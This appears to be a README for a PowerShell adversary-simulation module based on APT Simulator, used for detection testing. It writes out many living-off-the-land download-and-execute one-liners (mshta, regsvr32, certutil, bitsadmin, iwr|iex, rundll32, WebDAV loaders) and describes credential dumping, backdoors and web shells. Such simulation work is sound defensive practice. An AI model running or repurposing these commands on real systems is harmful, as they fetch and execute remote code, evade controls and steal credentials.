# Using the SIM Module






## Command and Control

- [HTTP Beacon](#http-beacon)
- [DNS Exfil](#dns-exfil)
- [DNS Tunnel](#dns-tunnel)
- [Mshta](#mshta)
- [Regsvr](#regsvr)
- [CertUtil](#certutil)
- [CertUtilB64](#certutilb64)
- [BitsAdmin](#bitsadmin)
- [PsIex](#psiex)
- [PsDownloadFile](#psdownloadfile)
- [Cscript](#cscript)
- [Wmic](#wmic)



### HTTP Beacon

The `New-SimHttpBeacon` function downloads and executes benign HTA file `payload.hta` using `mshta.exe`:


![](images/Using%20the%20SIM%20Module/image001.png)<br><br>


### DNS Exfil

The `New-SimDnsExfil` function downloads and executes benign HTA file `payload.hta` using `mshta.exe`:

![](images/Using%20the%20SIM%20Module/image002.png)<br><br>


### DNS Tunnel

The `New-SimDnsTunnel` function downloads and executes benign HTA file `payload.hta` using `mshta.exe`:

![](images/Using%20the%20SIM%20Module/image003.png)<br><br>


### Mshta

The `New-SimHtaMshta` function downloads and executes benign HTA file `payload.hta` using `mshta.exe`:

```powershell
mshta https://s3.amazonaws.com/exercise-pcap-download-link/payload.hta
```

### Regsvr

The `New-SimSctRegsvr32` function downloads and executes benign SCT file `payloadV.sct` using `regsvr32.exe`:

```powershell
cmd /c regsvr32 /s /u /n /i:https://s3.amazonaws.com/exercise-pcap-download-link/payloadV.sct scrobj.dll
```

### CertUtil

The `New-SimCertUtil` function downloads and executes benign executable `GoTeam.exe` using `certutil.exe`:

```powershell
cmd /c certutil -urlcache -split -f https://s3.amazonaws.com/exercise-pcap-download-link/GoTeam.exe `& GoTeam.exe
```

### CertUtilB64

The `New-SimCertUtilB64` function downloads and executes benign SCT file `payloadV.sct` using `certutil.exe`:

```powershell
 cmd /c certutil -urlcache -split -f https://s3.amazonaws.com/exercise-pcap-download-link/GoTeam.b64 GoTeam.b64 `& certutil -decode GoTeam.b64 GoTeam.exe `& GoTeam.exe
```

### BitsAdmin

The `New-SimBitsAdmin` function downloads and executes benign executable file `GoTeam.exe` using `bitsadmin.exe`:

```powershell
cmd /c bitsadmin /transfer myjob /download /priority high https://s3.amazonaws.com/exercise-pcap-download-link/GoTeam.exe %APPDATA%\a.exe&start %APPDATA%\a.exe"
```

### PsIex

The `New-SimPsIex` function downloads and executes benign executable file `GoTeam.exe` using `bitsadmin.exe`:

```powershell
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"
```

### PsDownloadFile

The `New-SimPsDownloadFile` function downloads and executes benign executable file `GoTeam.exe` using `DownloadFile()`:

```powershell
(New-Object System.Net.WebClient).DownloadFile('https://s3.amazonaws.com/exercise-pcap-download-link/GoTeam.exe','a.exe');Start-Process 'a.exe'
```

### CScript

The `New-SimCscript` function builds a `.vbs` file that downloads benign executable file `GoTeam.exe` and runs it with `cscript.exe`:

```powershell
cmd.exe /c "set c=AXOXB.Stream & @echo Set objXMLHTTP=CreateObject(`"MSXML2.XMLHTTP`")>gt.vbs&@echo objXMLHTTP.open `"GET`",`"https://s3.amazonaws.com/exercise-pcap-download-link/GoTeam.exe`",false>>gt.vbs&@echo objXMLHTTP.send()>>gt.vbs&@echo If objXMLHTTP.Status=200 Then>>gt.vbs&@echo Set objStreamADO=CreateObject(`"%c:X=D%`")>>gt.vbs&@echo objADOStream.Open>>gt.vbs&@echo objADOStream.Type=1 >>gt.vbs&@echo objADOStream.Write objXMLHTTP.ResponseBody>>gt.vbs&@echo objADOStream.Position=0 >>gt.vbs& @echo objADOStream.SaveToFile `"a.exe`">>gt.vbs&@echo objADOStream.Close>>gt.vbs&@echo Set objADOStream=Nothing>>gt.vbs&@echo End if>>gt.vbs&@echo Set objXMLHTTP=Nothing>>gt.vbs&@echo Set objShell=CreateObject(`"WScript.Shell`")>>gt.vbs&@echo objShell.Exec(`"a.exe`")>>gt.vbs&cscript.exe gt.vbs"
```

### Wmic

```powershell
cmd /c "wmic os get /format:`"https://s3.amazonaws.com/exercise-pcap-download-link/payload.xsl`""
```




####################################################


https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/




### C2 Connects
Uses Curl to access well-known C2 servers

### DNS Cache 1
Looks up several well-known C2 addresses to cause DNS requests and get the addresses into the local DNS cache

### Malicious User Agents
Uses malicious user agents to access web sites

### Ncat Back Connect
Drops a PowerShell Ncat alternative to the working directory and runs it to back connect to a well-known attacker domain

### WMI Backdoor C2
Using Matt Graeber's WMIBackdoor to contact a C2 in certain intervals

## Credential Access

### LSASS DUMP
Dumps LSASS process memory to a suspicious folder

### Mimikatz-1
Dumps mimikatz output to working directory (fallback if other executions fail)
Run special version of mimikatz and dump output to working directory
Run Invoke-Mimikatz in memory (github download, reflection)

### WCE-1
Creates Windwows Eventlog entries that look as if WCE had been executed

## Defense Evasion

### Active Guest Account Admin
Activates Guest user
Adds Guest user to the local administrators

### Fake System File
Drops suspicious executable with system file name (svchost.exe) in %PUBLIC% folder
Runs that suspicious program in %PUBLIC% folder

### Hosts
Adds entries to the local hosts file (update blocker, entries caused by malware)

### JS Dropper
Runs obfuscated JavaScript code with wscript.exe and starts decoded bind shell on port 1234/tcp

### Obfuscation
Drops a cloaked RAR file with JPG extension


## Discovery

###Nbtscan Discovery
Scanning 3 private IP address class-C subnets and dumping the output to the working directory

### Recon
Executes command used by attackers to get information about a target system

## Execution

### PsExec
Dump a renamed version of PsExec to the working directory
Run PsExec to start a command line in LOCAL_SYSTEM context

### Remote Execution Tool
Drops a remote execution tool to the working directory

## Lateral Movement
No test cases yet

## Persistence

### At Job
Creates an at job that runs mimikatz and dumps credentials to file

### RUN Key
Create a suspicious new RUN key entry that dumps "net user" output to a file

### Scheduled Task
Creates a scheduled task that runs mimikatz and dumps the output to a file

### Scheduled Task XML
Creates a scheduled task via XML file using Invoke-SchtasksBackdoor.ps1

### Sticky Key Backdoor
Tries to replace sethc.exe with cmd.exe (a backup file is created)
Tries to register cmd.exe as debugger for sethc.exe

### Web Shells
Creates a standard web root directory
Drops standard web shells to that diretory
Drops GIF obfuscated web shell to that diretory
UserInitMprLogonScript Persistence
Using the UserInitMprLogonScript key to get persistence

### WMI Backdoor
Using Matt Graeber's WMIBackdoor to kill local procexp64.exe when it starts


### WEBDAVSERVER

cmd.exe /k < \\webdavserver\folder\batchfile.txt

cscript //E:jscript \\webdavserver\folder\payload.txt

mshta \\webdavserver\folder\payload.hta

rundll32 \\webdavserver\folder\payload.dll,entrypoint

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll

regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll

odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}

cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"




## Collection

### Collect Local Files
drops pwdump output to the working dir
drops directory listing to the working dir

Based on [APT Simulator](https://github.com/NextronSystems/APTSimulator), a tool designed to simulate adversary activity.


- [Collection](#collection)
- [Command and Control](#command-and-control)
- [Credential Access](#credential-access)
- [Defense Evasion](#defense-evasion)
- [Discovery](#discovery)
- [Execution](#execution)
- [Lateral Movement](#lateral-movement)
- [Persistence](#persistence)







rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:https://s3.amazonaws.com/exercise-pcap-download-link/payloadJ.sct");window.close();


mshta vbscript:Close(Execute("GetObject(""script:https://s3.amazonaws.com/exercise-pcap-download-link/payloadV.sct"")"))


rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();





